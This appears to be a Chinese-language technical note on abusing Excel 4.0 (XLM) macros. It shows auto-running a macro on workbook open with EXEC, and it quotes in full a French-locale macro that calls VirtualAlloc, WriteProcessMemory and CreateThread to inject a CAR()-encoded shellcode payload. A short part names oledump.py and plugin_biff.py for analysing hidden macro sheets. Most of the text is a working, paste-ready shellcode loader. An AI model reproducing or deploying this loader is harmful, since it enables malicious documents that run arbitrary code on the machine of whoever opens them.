Excel4.0 宏(XLM) 在 1992 年 Excel 4.0 发布时成为默认的宏语言。最新的 Microsoft Office 版本仍支持 Excel 4.0 宏。

  1. Excel中插入4.0宏

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/12b7fdbc-9cf1-4b91-bfc2-843205b40cf0/Untitled.png

创建新工作表,可以在其中输入 XLM 宏。单元格中输入公式=EXEC(“calc.exe”)

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/dbae6ecd-8f29-46eb-962d-b33a242994d7/Untitled.png

设置打开工作簿时自动运行,将宏的第一个单元格重命名为Auto_open

  1. Excel宏调用api

通过 REGISTER 和 CALL 函数来实现

REGISTER(module_name, procedure_name, type, alias, argument, macro_type, category)

一个shellcode执行例子

https://gist.github.com/Arno0x/17d1705ecfc945088579c84994a652d3

BEWARE: THIS WILL ONLY WORK IN A FRENCH VERSION OF MS-OFFICE/EXCEL

1. Open Excel
2. Click on the active tab
3. Select "Insérer"
4. Click on "Macro MS Excel 4.0".
5. This will create a new worksheet called "Macro1"

================================================================================
In the Macro1 worksheet, paste the following block in cells in column A, starting in cell A1:
================================================================================

=REGISTRE("Kernel32";"VirtualAlloc";"JJJJJ";"VAlloc";;1;9)
=REGISTRE("Kernel32";"WriteProcessMemory";"JJJCJJ";"WProcessMemory";;1;9)
=REGISTRE("Kernel32";"CreateThread";"JJJJJJJ";"CThread";;1;9)
=VAlloc(0;4096;4096;64)
=SELECTIONNER(B1:B50;B1)
=POSER.VALEUR(C1;0)
=TANT.QUE(CELLULE.ACTIVE()<>"END")
=POSER.VALEUR(C2;NBCAR(CELLULE.ACTIVE()))
=WProcessMemory(-1; A4 + (C1 * 255); CELLULE.ACTIVE();NBCAR(CELLULE.ACTIVE()); 0)
=POSER.VALEUR(C1; C1 +1)
=SELECTIONNER(;"L(1)C")
=SUIVANT()
=CThread(0;0;A4;0;0;0)
=ARRETER()

================================================================================
In the Macro1 worksheet, paste the following shellcode payload in column B, starting in cell B1 (spawns calc.exe):
================================================================================
=CAR(217)&CAR(238)&CAR(184)&CAR(239)&CAR(216)&CAR(65)&CAR(149)&CAR(217)&CAR(116)&CAR(36)&CAR(244)&CAR(95)&CAR(49)&CAR(201)&CAR(177)&CAR(49)&CAR(131)&CAR(199)&CAR(4)&CAR(49)&CAR(71)&CAR(20)&CAR(3)&CAR(71)&CAR(251)&CAR(58)&CAR(180)&CAR(105)&CAR(235)&CAR(57)&CAR(55)&CAR(146)&CAR(235)&CAR(93)&CAR(177)&CAR(119)&CAR(218)&CAR(93)&CAR(165)&CAR(252)&CAR(76)&CAR(110)&CAR(173)&CAR(81)&CAR(96)&CAR(5)&CAR(227)&CAR(65)&CAR(243)&CAR(107)&CAR(44)&CAR(101)&CAR(180)&CAR(198)&CAR(10)&CAR(72)&CAR(69)&CAR(122)&CAR(110)&CAR(203)&CAR(197)&CAR(129)&CAR(163)&CAR(43)&CAR(244)&CAR(73)&CAR(182)&CAR(42)&CAR(49)&CAR(183)&CAR(59)&CAR(126)&CAR(234)&CAR(179)&CAR(238)&CAR(111)&CAR(159)&CAR(142)&CAR(50)&CAR(27)&CAR(211)&CAR(31)&CAR(51)&CAR(248)&CAR(163)&CAR(30)&CAR(18)&CAR(175)&CAR(184)&CAR(120)&CAR(180)&CAR(81)&CAR(109)&CAR(241)&CAR(253)&CAR(73)&CAR(114)&CAR(60)&CAR(183)&CAR(226)&CAR(64)&CAR(202)&CAR(70)&CAR(35)&CAR(153)&CAR(51)&CAR(228)&CAR(10)&CAR(22)&CAR(198)&CAR(244)&CAR(75)&CAR(144)&CAR(57)&CAR(131)&CAR(165)&CAR(227)&CAR(196)&CAR(148)&CAR(113)&CAR(158)&CAR(18)&CAR(16)&CAR(98)&CAR(56)&CAR(208)&CAR(130)&CAR(78)&CAR(185)&CAR(53)&CAR(84)&CAR(4)&CAR(181)&CAR(242)&CAR(18)&CAR(66)&CAR(217)&CAR(5)&CAR(246)&CAR(248)&CAR(229)&CAR(142)&CAR(249)&CAR(46)&CAR(108)&CAR(212)&CAR(221)&CAR(234)&CAR(53)&CAR(142)&CAR(124)&CAR(170)&CAR(147)&CAR(97)&CAR(128)&CAR(172)&CAR(124)&CAR(221)&CAR(36)&CAR(166)&CAR(144)&CAR(10)&CAR(85)&CAR(229)&CAR(254)&CAR(205)&CAR(235)&CAR(147)&CAR(76)&CAR(205)&CAR(243)&CAR(155)&CAR(224)&CAR(166)&CAR(194)&CAR(16)&CAR(111)&CAR(176)&CAR(218)&CAR(242)&CAR(212)&CAR(78)&CAR(145)&CAR(95)&CAR(124)&CAR(199)&CAR(124)&CAR(10)&CAR(61)&CAR(138)&CAR(126)&CAR(224)&CAR(1)&CAR(179)&CAR(252)&CAR(1)&CAR(249)&CAR(64)&CAR(28)&CAR(96)&CAR(252)&CAR(13)&CAR(154)&CAR(152)&CAR(140)&CAR(30)&CAR(79)&CAR(159)&CAR(35)&CAR(30)&CAR(90)&CAR(252)&CAR(162)&CAR(140)&CAR(6)&CAR(45)&CAR(65)&CAR(53)&CAR(172)&CAR(49)
END

3.sheet深度隐藏

https://blog.didierstevens.com/programs/oledump-py/

https://github.com/DidierStevens/DidierStevensSuite/blob/master/plugin_biff.py

oledump.py 是一个分析 OLE 文件的程序,可以用来查看xls。

Excel 4.0 宏功能存储在 BIFF 记录中,用插件 plugin_biff.py查看。